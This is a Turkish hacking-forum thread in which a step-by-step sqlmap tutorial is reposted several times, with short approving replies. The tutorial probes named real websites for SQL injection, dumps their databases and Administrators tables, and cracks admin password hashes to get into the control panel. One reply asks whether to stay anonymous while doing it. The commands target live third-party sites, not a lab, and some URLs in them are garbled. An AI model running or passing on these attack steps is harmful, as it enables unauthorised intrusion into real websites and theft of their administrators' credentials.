SQLMAP İle SQL Injection Hack [Windows CMD Üzerinden] / Veteran 7

bugradnmz

Yeni üye
2 Kas 2019
20
3
Pripyat
Cevap: SQLMAP İle SQL İnjection Hack [Windows CMD Üzerinden] / Veteran 7

Bayılıyorum SQL Injection'a. Tatmin edici. Eline sağlık.
 

JİTEM

Senior Hunter
31 May 2020
1,596
407
KATO DAĞI
Cevap: SQLMAP İle SQL İnjection Hack [Windows CMD Üzerinden] / Veteran 7

Gerekli Dosyalar & Kurulum

6bd224a8-e827-4593-b5b4-483338e9999e-python.png


sqlmap-feature.png


+ Python 2.7 adlı setup ile Python kuruyoruz +
+ sqlmap adlı dosyayı direkt Yerel Disk C'ye atıyoruz (yani c:\ dizininde olsun) +
+ İntelli Tamper 2.7 adlı program site dosyalarını verir admin paneli bulmak için kullanırız bunu +
+ Safe3 adlı program çok sağlam SQL İnjection taraması yapar sitede +

Gerekli Dosyaları İndirmek İçin Tıklayınız

Sorun yaşayanlar SQLMAP ve Python'u orjinal sitelerinden indirebilirler ;

sqlmap: automatic SQL injection and database takeover tool
python:https://tik.lat/7kHTI

kXG0ly.png


Adım 1 : SQLMAP'ı CMD İle Çalıştırma

Yukarıdakileri yaptıktan sonra Başlat'tan CMD konsolunu açalım ve konsol "C:" dizinine gelene kadar şu kodu yazalım ;

Kod:
cd..

Q1Q2d3.png


Konsol C:\ dizinine geldikten sonrada şu kodu yazalım ;

Kod:
cd sqlmap

X2d6zR.png


Bu adımlarıda yaparsak SQLMAP'ı çalıştırmış oluruz.

kXG0ly.png


Adım 2 : SQL Açıklı Site Bulmak

+ Sitelerin bazı sayfalarında , blogların paylaşımlarında bir id değeri olur örneğin "page.php?id=18" gibi.

+ Örnek Site : Welcome to the DockGuard website
+ Yukarıda verdiğim siteye girip sondaki ıd değerinin sonuna " ' " yani tek tırnak işareti koyduğunuzda aşağıdaki gibi ;

Kod:
http://www.dockguard.co.uk/page.php?id=18'

Şu hatayı alacaksınız ;

Kod:
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''18''' at line 1

Bu ve benzeri hata metinleri sitede sql açığı olduğuna dair en basit belirtilerdir.

kXG0ly.png


Adım 3 : SQL Açıklı Siteyi Ele Geçirmek (Veritabanını Çekmek)

Adım 3.1 - Sitenin Veritabanı İsimlerini Çekme (Database)

SQLMAP'te sitenin veritabanı isimlerini çekmek için şu kodu kullanırız ;

Kod:
sqlmap.py -u http://hedefsite.com...aciklibolum?id=--dbs

Yani biz açıklı olarak bulduğumuz herhangi bir siteyi çekmek için şu şekilde yazacağız ;

Kod:
sqlmap.py -u http://www.seaofstories.com/title.php?id=5193--dbs

Şimdi işleme geçelim cmdye kodumuzu yazalım ENTER tuşuna basalım

DyB5V1.png


ENTER tuşuna bastığımızda işleme geçiyor SQLMAP'ımız ve aşağıdaki resimde kırmızı ile bir kısım işaretledim sonuna dikkat ederseniz [Y/n] yazıyor yani Yes ? No ? diye soruyor bize öyle kısımlarda "y" yazıp ENTER tuşuna basıyoruz

Tespiti yapıyor bize açık olduğunu söylüyor ve yine "y" yazıp ENTER tuşuna basıp devam ediyoruz sonucunda veritabanı bilgilerini çekiyor aşağıdaki gibi

AZ3OnQ.png


kXG0ly.png


Adım 3.2 - Veritabanı Tablolarını Çekmek

SQLMAP'te sitenin tablolarını çekmek için şu kodu kullanırız ;

url] --tables


Yani biz yukarıda bulduğumuz sitenin tablolarını çekmek için şu şekilde yazacağız ;

Kod:
sqlmap.py -u http://www.seaofstories.com/title.php?id=5193seaofstories_app --tables

Not : "information_schema" adlı veritabanı ile işimiz yok bizim işimiz "seaofstories_app" adlı veritabanı ile. Aşağıdaki gibi kodumuzu yazı enter'a bastığımızda bize tablo isimlerini verecektir

V3Pzyr.png


İşlem bittiğinde bize tablo isimlerini verecektir biz orda işimize yarayanı tespit edeceğiz yani örnek olarak "Administrator" tablosunu buldu diyelim Administrator tablosunun kolonlarını çekeceğiz.

kXG0ly.png


Adım 3.3 - Veritabanı Tablolalarının Kolonlarını Çekmek

SQLMAP'te tablo kolonlarını çekmek için şu kodu kullanırız ;

Kod:
sqlmap.py -u http://hedefurl.com-D Veritabanı_Adı -T Tablo_Adı --columns

Yani yukarıdaki sitemizin Administrator tablosunun kolonlarını çekmek için şu şekilde yazacağız kodları ;

Kod:
sqlmap.py -u http://www.seaofstories.com/title.php?id=5193-D seaofstories_app -T Administrators --columns

Bu şekilde kodumuzu yazıp ENTER tuşuna bastığımızda bize o tablonun kolonlarını çekecektir işlem sırasında yine [Y/N] ? diye sorarsa "y" diyip Enter basın.

EQ3mmZ.png


Gördüğünüz gibi kolonları çekti şimdi sıra geldi son işleme bize panele girmek için "Username" ve "Password" kolonlarındaki ıd ve şifreler gerekli bunun için 4. adıma gidiyoruz.

kXG0ly.png


Adım 3.4 - Kolonlardaki Verileri (Username & Password) Çekme

SQLMAP'te kolonlardaki verileri çekmek için şu kodu kullanırız ;

Kod:
sqlmap.py -u http://hedefurl.com-D Veritabanı_Adı -T Tablo_Adı -C Kolon_Adı --dump

Yani yukarıdaki sitemizin password kolonlarındaki verilerini çekmek için şu şekilde yazacağız kodları

Kod:
sqlmap.py -u http://www.seaofstories.com/title.php?id=5193-D seaofstories_app -T Administrators -C password --dump

Bu şekilde kodumuzu yazıp ENTER tuşuna bastığımızda bize admin şifrelerini çekecektir işlem sırasında yine [Y/N] ? diye sorarsa "y" diyip Enter basın.

1jN6QD.png


Yukarıda gördüğünüz gibi MD5 şifreyi tespit etti ve üstte kırmızı ile işaretlediğim yerlerde bize sorular sordu "y" yazıp enter tuşuna bastık diğerindede wordlist kullanılsınmı diye sordu MD5 i kırmak için orda direkt "ENTER" tuşuna bastık herşeyi detaylı şekilde işaretledim ve altta kırmızı ile işaretlediğim yerde şifrenin kırılmış halini bize verdi.

Not : Aynı şekilde "username" adlı kolonu çekip admin giriş ıdlerine ulaşırsınız aynı şekilde olduğu için onu detaylı göstermedim onun kodunu yazarkende bu şekilde yazacaksınız ;

Kod:
 sqlmap.py -u http://www.seaofstories.com/title.php?id=5193-D seaofstories_app -T Administrators -C username --dump

kXG0ly.png


Yardımcı Olabilecek Yazılımlar

Veteran Dork Studio 3 FINAL - Dork Yardımcı Programı
Veteran SQLMAP Helper - SQLMAP Kod Yardımcı Programı

kXG0ly.png


V E T E R A N 7

Not : Konu bana aittir geçmişte açılan bir konuydu silinmişti,tekrardan derleyip konuyu açtım ilk görsellerde kırmızı çizili alanlarda bilgisayarın kullanıcı adı olarak ismim soyismim göründüğünden ötürü sansür uygulanmıştır.




Çok Güzel Olmuş Hocam Ellerinize Saglık.
 

maxalt

Yeni üye
7 May 2019
2
0
Cevap: SQLMAP İle SQL İnjection Hack [Windows CMD Üzerinden] / Veteran 7

Teşekkürler hocam
 

S_w_o_R_d

Uzman üye
17 Eki 2020
1,914
183
Neptün
Cevap: SQLMAP İle SQL İnjection Hack [Windows CMD Üzerinden] / Veteran 7

Yararlı ve güzel bir konu olmuş. Elinize sağlık.
 

Ghost Killer

Harici Saldırı Timleri Koordinatörü
13 Ocak 2019
11,318
7,706
Cevap: SQLMAP İle SQL İnjection Hack [Windows CMD Üzerinden] / Veteran 7

elinize emeğinize sağlık çok iyi bir konu
 

CiHaN-i TuRaN

Kıdemli Üye
29 Tem 2017
3,472
988
Cevap: SQLMAP İle SQL İnjection Hack [Windows CMD Üzerinden] / Veteran 7

Ellerinize Sağlık
 

kara1616

Yeni üye
5 Mar 2021
1
0
Hocam ben cmd kurumunu önce veterandan denedim sonuç alamadım daha sonra atmış olduğunuz linkten indirmeye çalıştım kılonladim ama yine sonuç alamadım cdm yi artık işlemcide görmüyor :) imkanlar kurtarmıyor sanırım ellerinize sağlık emeklerinize sağlık
 

Reushackk

Üye
13 Eki 2022
57
7
Gerekli Dosyalar & Kurulum



6bd224a8-e827-4593-b5b4-483338e9999e-python.png




sqlmap-feature.png




+ Python 2.7 adlı setup ile Python kuruyoruz +

+ sqlmap adlı dosyayı direkt Yerel Disk C'ye atıyoruz (yani c:\ dizininde olsun) +

+ İntelli Tamper 2.7 adlı program site dosyalarını verir admin paneli bulmak için kullanırız bunu +

+ Safe3 adlı program çok sağlam SQL İnjection taraması yapar sitede +



Gerekli Dosyaları İndirmek İçin Tıklayınız



Sorun yaşayanlar SQLMAP ve Python'u orjinal sitelerinden indirebilirler ;



sqlmap: automatic SQL injection and database takeover tool

python:Python 2.7.0 Release



kXG0ly.png




Adım 1 : SQLMAP'ı CMD İle Çalıştırma



Yukarıdakileri yaptıktan sonra Başlat'tan CMD konsolunu açalım ve konsol "C:" dizinine gelene kadar şu kodu yazalım ;



Kod:
cd..



Q1Q2d3.png




Konsol C:\ dizinine geldikten sonrada şu kodu yazalım ;



Kod:
cd sqlmap



X2d6zR.png




Bu adımlarıda yaparsak SQLMAP'ı çalıştırmış oluruz.



kXG0ly.png




Adım 2 : SQL Açıklı Site Bulmak



+ Sitelerin bazı sayfalarında , blogların paylaşımlarında bir id değeri olur örneğin "page.php?id=18" gibi.



+ Örnek Site : Welcome to the DockGuard website

+ Yukarıda verdiğim siteye girip sondaki ıd değerinin sonuna " ' " yani tek tırnak işareti koyduğunuzda aşağıdaki gibi ;



Kod:
http://www.dockguard.co.uk/page.php?id=18'



Şu hatayı alacaksınız ;



Kod:
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''18''' at line 1



Bu ve benzeri hata metinleri sitede sql açığı olduğuna dair en basit belirtilerdir.



kXG0ly.png




Adım 3 : SQL Açıklı Siteyi Ele Geçirmek (Veritabanını Çekmek)



Adım 3.1 - Sitenin Veritabanı İsimlerini Çekme (Database)



SQLMAP'te sitenin veritabanı isimlerini çekmek için şu kodu kullanırız ;



Kod:
sqlmap.py -u http://hedefsite.com...aciklibolum?id=--dbs



Yani biz açıklı olarak bulduğumuz herhangi bir siteyi çekmek için şu şekilde yazacağız ;



Kod:
sqlmap.py -u http://www.seaofstories.com/title.php?id=5193--dbs



Şimdi işleme geçelim cmdye kodumuzu yazalım ENTER tuşuna basalım



DyB5V1.png




ENTER tuşuna bastığımızda işleme geçiyor SQLMAP'ımız ve aşağıdaki resimde kırmızı ile bir kısım işaretledim sonuna dikkat ederseniz [Y/n] yazıyor yani Yes ? No ? diye soruyor bize öyle kısımlarda "y" yazıp ENTER tuşuna basıyoruz



Tespiti yapıyor bize açık olduğunu söylüyor ve yine "y" yazıp ENTER tuşuna basıp devam ediyoruz sonucunda veritabanı bilgilerini çekiyor aşağıdaki gibi



AZ3OnQ.png




kXG0ly.png




Adım 3.2 - Veritabanı Tablolarını Çekmek



SQLMAP'te sitenin tablolarını çekmek için şu kodu kullanırız ;



url] --tables




Yani biz yukarıda bulduğumuz sitenin tablolarını çekmek için şu şekilde yazacağız ;



Kod:
sqlmap.py -u http://www.seaofstories.com/title.php?id=5193seaofstories_app --tables



Not : "information_schema" adlı veritabanı ile işimiz yok bizim işimiz "seaofstories_app" adlı veritabanı ile. Aşağıdaki gibi kodumuzu yazı enter'a bastığımızda bize tablo isimlerini verecektir



V3Pzyr.png




İşlem bittiğinde bize tablo isimlerini verecektir biz orda işimize yarayanı tespit edeceğiz yani örnek olarak "Administrator" tablosunu buldu diyelim Administrator tablosunun kolonlarını çekeceğiz.



kXG0ly.png




Adım 3.3 - Veritabanı Tablolalarının Kolonlarını Çekmek



SQLMAP'te tablo kolonlarını çekmek için şu kodu kullanırız ;



Kod:
sqlmap.py -u http://hedefurl.com-D Veritabanı_Adı -T Tablo_Adı --columns



Yani yukarıdaki sitemizin Administrator tablosunun kolonlarını çekmek için şu şekilde yazacağız kodları ;



Kod:
sqlmap.py -u http://www.seaofstories.com/title.php?id=5193-D seaofstories_app -T Administrators --columns



Bu şekilde kodumuzu yazıp ENTER tuşuna bastığımızda bize o tablonun kolonlarını çekecektir işlem sırasında yine [Y/N] ? diye sorarsa "y" diyip Enter basın.



EQ3mmZ.png




Gördüğünüz gibi kolonları çekti şimdi sıra geldi son işleme bize panele girmek için "Username" ve "Password" kolonlarındaki ıd ve şifreler gerekli bunun için 4. adıma gidiyoruz.



kXG0ly.png




Adım 3.4 - Kolonlardaki Verileri (Username & Password) Çekme



SQLMAP'te kolonlardaki verileri çekmek için şu kodu kullanırız ;



Kod:
sqlmap.py -u http://hedefurl.com-D Veritabanı_Adı -T Tablo_Adı -C Kolon_Adı --dump



Yani yukarıdaki sitemizin password kolonlarındaki verilerini çekmek için şu şekilde yazacağız kodları



Kod:
sqlmap.py -u http://www.seaofstories.com/title.php?id=5193-D seaofstories_app -T Administrators -C password --dump



Bu şekilde kodumuzu yazıp ENTER tuşuna bastığımızda bize admin şifrelerini çekecektir işlem sırasında yine [Y/N] ? diye sorarsa "y" diyip Enter basın.



1jN6QD.png




Yukarıda gördüğünüz gibi MD5 şifreyi tespit etti ve üstte kırmızı ile işaretlediğim yerlerde bize sorular sordu "y" yazıp enter tuşuna bastık diğerindede wordlist kullanılsınmı diye sordu MD5 i kırmak için orda direkt "ENTER" tuşuna bastık herşeyi detaylı şekilde işaretledim ve altta kırmızı ile işaretlediğim yerde şifrenin kırılmış halini bize verdi.



Not : Aynı şekilde "username" adlı kolonu çekip admin giriş ıdlerine ulaşırsınız aynı şekilde olduğu için onu detaylı göstermedim onun kodunu yazarkende bu şekilde yazacaksınız ;



Kod:
 sqlmap.py -u http://www.seaofstories.com/title.php?id=5193-D seaofstories_app -T Administrators -C username --dump



kXG0ly.png




Yardımcı Olabilecek Yazılımlar



Veteran Dork Studio 3 FINAL - Dork Yardımcı Programı

Veteran SQLMAP Helper - SQLMAP Kod Yardımcı Programı



kXG0ly.png




V E T E R A N 7



Not : Konu bana aittir geçmişte açılan bir konuydu silinmişti,tekrardan derleyip konuyu açtım ilk görsellerde kırmızı çizili alanlarda bilgisayarın kullanıcı adı olarak ismim soyismim göründüğünden ötürü sansür uygulanmıştır.






Hocam bu işlemi yaparken anonim kalmalı mıyız
 

Woffluon

Katılımcı Üye
7 Tem 2021
279
95
Gerekli Dosyalar & Kurulum



6bd224a8-e827-4593-b5b4-483338e9999e-python.png




sqlmap-feature.png




+ Python 2.7 adlı setup ile Python kuruyoruz +

+ sqlmap adlı dosyayı direkt Yerel Disk C'ye atıyoruz (yani c:\ dizininde olsun) +

+ İntelli Tamper 2.7 adlı program site dosyalarını verir admin paneli bulmak için kullanırız bunu +

+ Safe3 adlı program çok sağlam SQL İnjection taraması yapar sitede +



Gerekli Dosyaları İndirmek İçin Tıklayınız



Sorun yaşayanlar SQLMAP ve Python'u orjinal sitelerinden indirebilirler ;



sqlmap: automatic SQL injection and database takeover tool

python:Python 2.7.0 Release



kXG0ly.png




Adım 1 : SQLMAP'ı CMD İle Çalıştırma



Yukarıdakileri yaptıktan sonra Başlat'tan CMD konsolunu açalım ve konsol "C:" dizinine gelene kadar şu kodu yazalım ;



Kod:
cd..



Q1Q2d3.png




Konsol C:\ dizinine geldikten sonrada şu kodu yazalım ;



Kod:
cd sqlmap



X2d6zR.png




Bu adımlarıda yaparsak SQLMAP'ı çalıştırmış oluruz.



kXG0ly.png




Adım 2 : SQL Açıklı Site Bulmak



+ Sitelerin bazı sayfalarında , blogların paylaşımlarında bir id değeri olur örneğin "page.php?id=18" gibi.



+ Örnek Site : Welcome to the DockGuard website

+ Yukarıda verdiğim siteye girip sondaki ıd değerinin sonuna " ' " yani tek tırnak işareti koyduğunuzda aşağıdaki gibi ;



Kod:
http://www.dockguard.co.uk/page.php?id=18'



Şu hatayı alacaksınız ;



Kod:
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''18''' at line 1



Bu ve benzeri hata metinleri sitede sql açığı olduğuna dair en basit belirtilerdir.



kXG0ly.png




Adım 3 : SQL Açıklı Siteyi Ele Geçirmek (Veritabanını Çekmek)



Adım 3.1 - Sitenin Veritabanı İsimlerini Çekme (Database)



SQLMAP'te sitenin veritabanı isimlerini çekmek için şu kodu kullanırız ;



Kod:
sqlmap.py -u http://hedefsite.com...aciklibolum?id=--dbs



Yani biz açıklı olarak bulduğumuz herhangi bir siteyi çekmek için şu şekilde yazacağız ;



Kod:
sqlmap.py -u http://www.seaofstories.com/title.php?id=5193--dbs



Şimdi işleme geçelim cmdye kodumuzu yazalım ENTER tuşuna basalım



DyB5V1.png




ENTER tuşuna bastığımızda işleme geçiyor SQLMAP'ımız ve aşağıdaki resimde kırmızı ile bir kısım işaretledim sonuna dikkat ederseniz [Y/n] yazıyor yani Yes ? No ? diye soruyor bize öyle kısımlarda "y" yazıp ENTER tuşuna basıyoruz



Tespiti yapıyor bize açık olduğunu söylüyor ve yine "y" yazıp ENTER tuşuna basıp devam ediyoruz sonucunda veritabanı bilgilerini çekiyor aşağıdaki gibi



AZ3OnQ.png




kXG0ly.png




Adım 3.2 - Veritabanı Tablolarını Çekmek



SQLMAP'te sitenin tablolarını çekmek için şu kodu kullanırız ;



url] --tables




Yani biz yukarıda bulduğumuz sitenin tablolarını çekmek için şu şekilde yazacağız ;



Kod:
sqlmap.py -u http://www.seaofstories.com/title.php?id=5193seaofstories_app --tables



Not : "information_schema" adlı veritabanı ile işimiz yok bizim işimiz "seaofstories_app" adlı veritabanı ile. Aşağıdaki gibi kodumuzu yazı enter'a bastığımızda bize tablo isimlerini verecektir



V3Pzyr.png




İşlem bittiğinde bize tablo isimlerini verecektir biz orda işimize yarayanı tespit edeceğiz yani örnek olarak "Administrator" tablosunu buldu diyelim Administrator tablosunun kolonlarını çekeceğiz.



kXG0ly.png




Adım 3.3 - Veritabanı Tablolalarının Kolonlarını Çekmek



SQLMAP'te tablo kolonlarını çekmek için şu kodu kullanırız ;



Kod:
sqlmap.py -u http://hedefurl.com-D Veritabanı_Adı -T Tablo_Adı --columns



Yani yukarıdaki sitemizin Administrator tablosunun kolonlarını çekmek için şu şekilde yazacağız kodları ;



Kod:
sqlmap.py -u http://www.seaofstories.com/title.php?id=5193-D seaofstories_app -T Administrators --columns



Bu şekilde kodumuzu yazıp ENTER tuşuna bastığımızda bize o tablonun kolonlarını çekecektir işlem sırasında yine [Y/N] ? diye sorarsa "y" diyip Enter basın.



EQ3mmZ.png




Gördüğünüz gibi kolonları çekti şimdi sıra geldi son işleme bize panele girmek için "Username" ve "Password" kolonlarındaki ıd ve şifreler gerekli bunun için 4. adıma gidiyoruz.



kXG0ly.png




Adım 3.4 - Kolonlardaki Verileri (Username & Password) Çekme



SQLMAP'te kolonlardaki verileri çekmek için şu kodu kullanırız ;



Kod:
sqlmap.py -u http://hedefurl.com-D Veritabanı_Adı -T Tablo_Adı -C Kolon_Adı --dump



Yani yukarıdaki sitemizin password kolonlarındaki verilerini çekmek için şu şekilde yazacağız kodları



Kod:
sqlmap.py -u http://www.seaofstories.com/title.php?id=5193-D seaofstories_app -T Administrators -C password --dump



Bu şekilde kodumuzu yazıp ENTER tuşuna bastığımızda bize admin şifrelerini çekecektir işlem sırasında yine [Y/N] ? diye sorarsa "y" diyip Enter basın.



1jN6QD.png




Yukarıda gördüğünüz gibi MD5 şifreyi tespit etti ve üstte kırmızı ile işaretlediğim yerlerde bize sorular sordu "y" yazıp enter tuşuna bastık diğerindede wordlist kullanılsınmı diye sordu MD5 i kırmak için orda direkt "ENTER" tuşuna bastık herşeyi detaylı şekilde işaretledim ve altta kırmızı ile işaretlediğim yerde şifrenin kırılmış halini bize verdi.



Not : Aynı şekilde "username" adlı kolonu çekip admin giriş ıdlerine ulaşırsınız aynı şekilde olduğu için onu detaylı göstermedim onun kodunu yazarkende bu şekilde yazacaksınız ;



Kod:
 sqlmap.py -u http://www.seaofstories.com/title.php?id=5193-D seaofstories_app -T Administrators -C username --dump



kXG0ly.png




Yardımcı Olabilecek Yazılımlar



Veteran Dork Studio 3 FINAL - Dork Yardımcı Programı

Veteran SQLMAP Helper - SQLMAP Kod Yardımcı Programı



kXG0ly.png




V E T E R A N 7



Not : Konu bana aittir geçmişte açılan bir konuydu silinmişti,tekrardan derleyip konuyu açtım ilk görsellerde kırmızı çizili alanlarda bilgisayarın kullanıcı adı olarak ismim soyismim göründüğünden ötürü sansür uygulanmıştır.






Elinize sağlık hocam çok güzel bir konu olmuş.
 

Butcherb3y

Uzman üye
1 Eyl 2022
1,501
1,124
Anıtkabir
Gerekli Dosyalar & Kurulum



6bd224a8-e827-4593-b5b4-483338e9999e-python.png




sqlmap-feature.png




+ Python 2.7 adlı setup ile Python kuruyoruz +

+ sqlmap adlı dosyayı direkt Yerel Disk C'ye atıyoruz (yani c:\ dizininde olsun) +

+ İntelli Tamper 2.7 adlı program site dosyalarını verir admin paneli bulmak için kullanırız bunu +

+ Safe3 adlı program çok sağlam SQL İnjection taraması yapar sitede +



Gerekli Dosyaları İndirmek İçin Tıklayınız



Sorun yaşayanlar SQLMAP ve Python'u orjinal sitelerinden indirebilirler ;



sqlmap: automatic SQL injection and database takeover tool

python:https://tik.lat/7kHTI



kXG0ly.png




Adım 1 : SQLMAP'ı CMD İle Çalıştırma



Yukarıdakileri yaptıktan sonra Başlat'tan CMD konsolunu açalım ve konsol "C:" dizinine gelene kadar şu kodu yazalım ;



Kod:
cd..



Q1Q2d3.png




Konsol C:\ dizinine geldikten sonrada şu kodu yazalım ;



Kod:
cd sqlmap



X2d6zR.png




Bu adımlarıda yaparsak SQLMAP'ı çalıştırmış oluruz.



kXG0ly.png




Adım 2 : SQL Açıklı Site Bulmak



+ Sitelerin bazı sayfalarında , blogların paylaşımlarında bir id değeri olur örneğin "page.php?id=18" gibi.



+ Örnek Site : Welcome to the DockGuard website

+ Yukarıda verdiğim siteye girip sondaki ıd değerinin sonuna " ' " yani tek tırnak işareti koyduğunuzda aşağıdaki gibi ;



Kod:
http://www.dockguard.co.uk/page.php?id=18'



Şu hatayı alacaksınız ;



Kod:
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''18''' at line 1



Bu ve benzeri hata metinleri sitede sql açığı olduğuna dair en basit belirtilerdir.



kXG0ly.png




Adım 3 : SQL Açıklı Siteyi Ele Geçirmek (Veritabanını Çekmek)



Adım 3.1 - Sitenin Veritabanı İsimlerini Çekme (Database)



SQLMAP'te sitenin veritabanı isimlerini çekmek için şu kodu kullanırız ;



Kod:
sqlmap.py -u http://hedefsite.com...aciklibolum?id=--dbs



Yani biz açıklı olarak bulduğumuz herhangi bir siteyi çekmek için şu şekilde yazacağız ;



Kod:
sqlmap.py -u http://www.seaofstories.com/title.php?id=5193--dbs



Şimdi işleme geçelim cmdye kodumuzu yazalım ENTER tuşuna basalım



DyB5V1.png




ENTER tuşuna bastığımızda işleme geçiyor SQLMAP'ımız ve aşağıdaki resimde kırmızı ile bir kısım işaretledim sonuna dikkat ederseniz [Y/n] yazıyor yani Yes ? No ? diye soruyor bize öyle kısımlarda "y" yazıp ENTER tuşuna basıyoruz



Tespiti yapıyor bize açık olduğunu söylüyor ve yine "y" yazıp ENTER tuşuna basıp devam ediyoruz sonucunda veritabanı bilgilerini çekiyor aşağıdaki gibi



AZ3OnQ.png




kXG0ly.png




Adım 3.2 - Veritabanı Tablolarını Çekmek



SQLMAP'te sitenin tablolarını çekmek için şu kodu kullanırız ;



url] --tables




Yani biz yukarıda bulduğumuz sitenin tablolarını çekmek için şu şekilde yazacağız ;



Kod:
sqlmap.py -u http://www.seaofstories.com/title.php?id=5193seaofstories_app --tables



Not : "information_schema" adlı veritabanı ile işimiz yok bizim işimiz "seaofstories_app" adlı veritabanı ile. Aşağıdaki gibi kodumuzu yazı enter'a bastığımızda bize tablo isimlerini verecektir



V3Pzyr.png




İşlem bittiğinde bize tablo isimlerini verecektir biz orda işimize yarayanı tespit edeceğiz yani örnek olarak "Administrator" tablosunu buldu diyelim Administrator tablosunun kolonlarını çekeceğiz.



kXG0ly.png




Adım 3.3 - Veritabanı Tablolalarının Kolonlarını Çekmek



SQLMAP'te tablo kolonlarını çekmek için şu kodu kullanırız ;



Kod:
sqlmap.py -u http://hedefurl.com-D Veritabanı_Adı -T Tablo_Adı --columns



Yani yukarıdaki sitemizin Administrator tablosunun kolonlarını çekmek için şu şekilde yazacağız kodları ;



Kod:
sqlmap.py -u http://www.seaofstories.com/title.php?id=5193-D seaofstories_app -T Administrators --columns



Bu şekilde kodumuzu yazıp ENTER tuşuna bastığımızda bize o tablonun kolonlarını çekecektir işlem sırasında yine [Y/N] ? diye sorarsa "y" diyip Enter basın.



EQ3mmZ.png




Gördüğünüz gibi kolonları çekti şimdi sıra geldi son işleme bize panele girmek için "Username" ve "Password" kolonlarındaki ıd ve şifreler gerekli bunun için 4. adıma gidiyoruz.



kXG0ly.png




Adım 3.4 - Kolonlardaki Verileri (Username & Password) Çekme



SQLMAP'te kolonlardaki verileri çekmek için şu kodu kullanırız ;



Kod:
sqlmap.py -u http://hedefurl.com-D Veritabanı_Adı -T Tablo_Adı -C Kolon_Adı --dump



Yani yukarıdaki sitemizin password kolonlarındaki verilerini çekmek için şu şekilde yazacağız kodları



Kod:
sqlmap.py -u http://www.seaofstories.com/title.php?id=5193-D seaofstories_app -T Administrators -C password --dump



Bu şekilde kodumuzu yazıp ENTER tuşuna bastığımızda bize admin şifrelerini çekecektir işlem sırasında yine [Y/N] ? diye sorarsa "y" diyip Enter basın.



1jN6QD.png




Yukarıda gördüğünüz gibi MD5 şifreyi tespit etti ve üstte kırmızı ile işaretlediğim yerlerde bize sorular sordu "y" yazıp enter tuşuna bastık diğerindede wordlist kullanılsınmı diye sordu MD5 i kırmak için orda direkt "ENTER" tuşuna bastık herşeyi detaylı şekilde işaretledim ve altta kırmızı ile işaretlediğim yerde şifrenin kırılmış halini bize verdi.



Not : Aynı şekilde "username" adlı kolonu çekip admin giriş ıdlerine ulaşırsınız aynı şekilde olduğu için onu detaylı göstermedim onun kodunu yazarkende bu şekilde yazacaksınız ;



Kod:
 sqlmap.py -u http://www.seaofstories.com/title.php?id=5193-D seaofstories_app -T Administrators -C username --dump



kXG0ly.png




Yardımcı Olabilecek Yazılımlar



Veteran Dork Studio 3 FINAL - Dork Yardımcı Programı

Veteran SQLMAP Helper - SQLMAP Kod Yardımcı Programı



kXG0ly.png




V E T E R A N 7



Not : Konu bana aittir geçmişte açılan bir konuydu silinmişti,tekrardan derleyip konuyu açtım ilk görsellerde kırmızı çizili alanlarda bilgisayarın kullanıcı adı olarak ismim soyismim göründüğünden ötürü sansür uygulanmıştır.






Elinize sağlık
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.